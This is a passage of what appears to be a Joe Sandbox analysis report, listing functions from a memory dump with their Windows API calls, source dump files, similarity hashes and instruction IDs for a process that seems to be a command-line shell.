                                                                                                                                                                                                                                                                                                                                                                                                                          • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000001), ref: 0003096F
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0003097D
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2968197161-2766056989
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e5a6ee17d4f23d572306ff12b75f7b53a3814925b5f5a5b57cffdaf07fe5f648
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4e50d2dc22c5839bd7a0cde3871b02f475ea8eeb9b11fe4a4ceb744bd27b8999
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5a6ee17d4f23d572306ff12b75f7b53a3814925b5f5a5b57cffdaf07fe5f648
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13217E71E00219AFEB11DFA5D848AEFBBBCAB45721F104126EA06F2251DB749E058B60
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00037460 Relevance: 13.6, APIs: 9, Instructions: 66filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00037483
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00037495
                                                                                                                                                                                                                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 000374BB
                                                                                                                                                                                                                                                                                                                                                                                                                          • fflush.MSVCRT ref: 000374C9
                                                                                                                                                                                                                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 000374E2
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 000374F8
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 000374FF
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0003751C
                                                                                                                                                                                                                                                                                                                                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00037524
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3139166086-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d9eb5b93897ff44fac9221a37fd8349dc8fd10d8e440dddad994084440b3eb78
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c185341809c4ac292a66190d553845b3a647cd94743d10133853705ea66e1f04
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9eb5b93897ff44fac9221a37fd8349dc8fd10d8e440dddad994084440b3eb78
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C11E9B0204300EFFB2A1B64ED0EB6B3B6CEF46716F000219F509910A2E7BD9941CB56
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00014E3B Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _setjmp3.MSVCRT ref: 00014E78
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00058BF0,00000000,?), ref: 00018EC3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtQueryInformationProcess.NTDLL ref: 00014F28
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtSetInformationProcess.NTDLL ref: 00014F46
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtSetInformationProcess.NTDLL ref: 00014FAE
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001,00000000), ref: 000291C8
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %9d$P,Fw
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4212706909-3698535272
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: de1505b7723ae1b5c64a4438d9f34340d0c0fe0276f136c12a6c1cc02f59ed83
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: add1f9f408f92fa377932f063d1b64a21c4a53f30fe515cca8c9aaed78a82f19
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de1505b7723ae1b5c64a4438d9f34340d0c0fe0276f136c12a6c1cc02f59ed83
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA41F6B0A04311AFE710DFA5DC45AAABBF4EB86714F10412AEA14D73D1E7B94940CB96
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00024875 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 376COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021D90: _wcsnicmp.MSVCRT ref: 00021E14
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00024BAF: _wcsnicmp.MSVCRT ref: 00024C1A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00024BAF: _wcsnicmp.MSVCRT ref: 00030B39
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00024975
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00000000,00000001), ref: 00024ABC
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00024AF4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00024AFF
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00000000), ref: 00024B28
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: COPYCMD
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1068965577-3727491224
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 448eb519bd7ecf1200a3d6774060109f9f1878e390f0e648274ae5da7774e00f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 71483dd935ba09cc3939d5239c68ec5ff5b199b2c6a78d4350daaed83f3081ef
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 448eb519bd7ecf1200a3d6774060109f9f1878e390f0e648274ae5da7774e00f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3D10735B002268BDB25DF78E8A5ABEB3F5EF58300F554569D80AD7281EB34ED81CB41
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00017A34 Relevance: 9.3, APIs: 6, Instructions: 338COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00017A9C
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00017AC7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00017BCA
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00017BDC
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 0002AE5B
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$Heap$AllocProcesslongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2656838167-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: dbff794b69cb758e1cd509ba29121dc5a56d5f622696f2d085776346578989e3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 662eeb8deea82dc47612154122388dd2444a141c000222e28887d3a77d42a0a5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbff794b69cb758e1cd509ba29121dc5a56d5f622696f2d085776346578989e3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55D1C370A082259BDF78DF24D8957EEB7B1AF05300F1441ADE90E97682DB70AEC1CB95
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00016E57 Relevance: 9.3, APIs: 6, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d7650d26ef27d63da625a9e4a9495a61de92c20190462a69d58797344cf31486
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 846c1453fe2e4583b847c5898daed3dcb9bb1123737644ea2847823becf436b1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7650d26ef27d63da625a9e4a9495a61de92c20190462a69d58797344cf31486
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6C1C2756083118BD724EF24D851AAAB7F2EF99304F04892DF88687352EF35DD85CB92
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00020740 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 000208D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 000208F3
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 0002090B
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcstol$Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2343214347-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 947c6def3c04ff49f5068ea7bd949f82a71dda1f68fa5fee8622122b2556182c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e1843617c676d0f90ab3a7394299e8d7955e4bc7fb8e067c8c45f23c3ecf4029
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 947c6def3c04ff49f5068ea7bd949f82a71dda1f68fa5fee8622122b2556182c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22A1D274A003258FEB24DFA4E8849BEB7F6EF45304B14402EE946DB352EB759C81CB95
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00016B20 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • _pipe.MSVCRT ref: 00016B4F
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00016BF7
                                                                                                                                                                                                                                                                                                                                                                                                                          • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00016C05
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: memset.MSVCRT ref: 0001E9A0
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: wcschr.MSVCRT ref: 0001E9FC
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: wcschr.MSVCRT ref: 0001EA14
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E950: _wcsicmp.MSVCRT ref: 0001EA80
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00016D8F
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001), ref: 0002A6D8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A1A8: _dup.MSVCRT ref: 0001A1AF
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A1D6: _dup2.MSVCRT ref: 0001A1EA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A16C: _close.MSVCRT ref: 0001A19B
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1441200171-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 62d9dc50517790cb8247699746aa90670f6e0c1e982f6197a55b5439ebb8dfe4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5d2110bae1e32b52d7ad5c269f28a0160af9bdb1a0355c51dd46897d2da2b777
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62d9dc50517790cb8247699746aa90670f6e0c1e982f6197a55b5439ebb8dfe4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4691A3757007119FDB24EF24EC86AAA73E1EB8A320F14492EE45AD7292DF35DC81CB45
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00026B40 Relevance: 6.0, APIs: 4, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00026C76,00011000), ref: 00026B47
                                                                                                                                                                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00026C76,?,00026C76,00011000), ref: 00026B50
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00026C76,00011000), ref: 00026B5B
                                                                                                                                                                                                                                                                                                                                                                                                                          • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00026C76,00011000), ref: 00026B62
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3231755760-0
